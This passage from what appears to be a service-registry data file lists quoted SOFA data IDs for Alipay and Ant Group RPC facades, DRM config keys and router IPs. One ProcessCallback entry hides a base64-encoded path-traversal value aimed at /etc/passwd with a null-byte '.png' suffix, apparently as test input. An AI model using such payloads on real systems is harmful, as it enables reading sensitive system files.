service.airpay.AirpayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mockapp:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.homeDecorateContractSignWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:clearDeductApplyExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEFAULT_UNIFORM_EVENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.biz.service.gw.community.api.log.LoggerGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.integration.d2.UserAKService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.application.SystemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.ClusterMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.248.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.mpoint.facade.MpointFlowoutSimpleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.appxinfo.AppxVersionConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpaas.zpaas_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.query.fundboss.api.QueryFxAccItemPageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insliveprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.irisk.IntlAtomicDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductRelationQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.unifiedasset.order.AssetUnifiedOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcplan.common.service.facade.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:antemc_sub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.test.sofaregistry-client-test-unpub-AAAAAA-8#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.service.uniformprocess.callback.CallbackInvokeProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.financeprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.207.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.equity.common.schedule.api.ScheduleConfigService:1.0:equitytradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LINKA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:antmember@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.VerifyConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DONE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.loan.api.LoanBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.SceneQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PFUNDDTS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.spi.SpiServiceProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IExecuteInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservindustryprod.common.service.facade.recruit.ApplyRecordsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.insuserinsight.facade.usergrowth.GrowthMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_K_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lifemng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instfluxcore.common.service.facade.cache.CacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.CertifyReqServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.requirement.service.facade.RequirementContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.specialChoosenProductJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:apires_auditTaskFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.FaAssetManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcachev3case.facade.TairService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.core.service.gray.grayConfigDrmHandler.enquiryFuseText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.reservecenter.common.service.facade.api.InterbankAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bizfundprod.common.service.facade.account.AssetBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.ldc.demo.TestService:1.0:unique123Id@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.survey.SurveyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.InstTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowAttachmentInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.sms.api.SmsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.mservice.koi.rpc.KoiActivityRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amct.facade.JobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.algorithm.SecurityAlgorithmService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.common.service.facade.BillCustomFormatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.cache.PscConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.notify.ExterfaceNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:buservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PointProcessDrmResouce.processNewOrOld,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecocheck.common.service.facade.SyncCheckServiceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.OperationRecordUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.plugin.core.ldc.LdcRouteService:1.0:payflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.publish.service.CoordinateMessageService:1.0:ceif-cus-query@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:smcp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.profile.ProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.document.open.DocManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.mock.OutSyncTransCallBackForLdcMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fundEquityBlackType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:autoaftermarketunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.topic.TopicManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.CampEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettleprod.common.service.integration.acep.AcepClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaycore.common.service.facade.mng.api.DepositManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.serivce.query.UsageAgreementQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.SubscriptionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsupport.common.service.facade.recon.BatchOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oe_activityProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListAbandonSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.SearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.YunHotLineVideoSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appfuse.plugin.entity.facade.EntityFacade:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.toolreport.ToolReportFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.synCenterNodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprerec.service.IterationMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketcore.common.service.facade.ProductNewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.stockassetcore.common.service.facade.api.UserAttentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.card.PcreditCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.securitycap.core.service.threshold.drm.ProfilerThresholdResource.detailDurationLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowArchiveKademandGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cnamlmatrix@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ifundcontrolmodel.core.service.physicaltransactionfund.ModelProductionTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:instfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.malgo.common.facade.UcdpConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insttrade.common.service.facade.InstOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.planning.facade.api.BPOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_benetnasch_task_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iusergrowthus.facade.api.LoyaltyProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.AppAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ADDP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.180.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.facade.api.report.ReportQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.floor.FloorMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntContractRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@funcdispatcher#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pricemng.common.service.facade.api.ctemplate.PricemngConditionTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountAdjust_SysCallback2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.rank.RankRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.api.AcwSubjectFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_LINKE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataservice:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zcache.tbase.ipciTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.LifeappChangeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_HDWONS_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.v2.mining.facade.NodeMiningTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:obglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antprivacy.common.service.facade.TestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.promotion.PromotionTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.merchandise.MerchandiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualityprod.service.riskctrl.spi.ChangeCtrlCallbackService:1.0:emccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.LoadReservationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.sql.service.DataviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openCity_nodeHandle_ProcessCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincapacity.biz.facade.CardMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_openFormAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.comment.message.mock.FriendshipChangeMsgMockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.facade.api.MobileSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.SignRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.attack.AttackTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.GrowthAchievementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.analyze.alpharisk.core.infocode.api.IUctInfoCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.qrcode.AssetQrCodeActiveFacade:1.0:mrchasset_marketing_assetQrCodeActive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.account.MerchantAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.biz.service.impl.feature.sofarest.FeatureSofaRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoprod.common.service.facade.spring.YebSpringCampFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.218.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.cfmng.drmconfig.CfmngCacheResource.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instfund.facade.api.InstCashPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.supplementSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprofile.facade.usernet.api.UsernetMetaInforServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ProductExcQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ability.ParmAbilityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.CatWarnQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainabsprod.common.facade.api.common.member.MemberAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.cacheKeyAndStrategyForRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpartner.common.service.facade.RiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.arater.common.service.facade.api.management.rate.RateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.TransportPathPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.SceneProductActionPacketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccmdatagw.ccmbiz.facade.MiniappCsConfigGWFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.discardDwDagIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antiep.common.service.facade.AntiepRightsBizFacade:1.0:sportsprod_rightsBizFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:accArgoConfigDeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.reservation.ReservationItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.enroll.EnrollQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcreditquery.facade.credit.api.CreditAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditrmp.facade.linke.LinkeMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.common.service.facade.api.UserPassbookService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.TagValueManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.BudgetUsageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GLOBALREMITMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.assign.AssetAssignRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.204.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.distinguishprod.common.service.facade.ResRecSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RcHgCheckProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.insproduct.InsProductProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:beyondservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insscenemarket.common.facade.DsdbT0CheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.service.facade.insurance.HospitalMatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acctransquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.spi.DailyTaskExternalConsultService:1.0:finscprodWeatherParticipated@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.XtsConfigResource.depositActionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlink.facade.RelationServiceFacade:1.0:antlinkmsdefault@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@discount#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.publiccore.common.service.facade.recommend.LifeAddressServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obcustomercore.common.service.facade.UCKernelServiceAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.log.ContentLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finbatchTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:antassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.manage.groupconfig.service.GroupConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_AEICORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.api.ApiManageFacade:1.0:opencore@X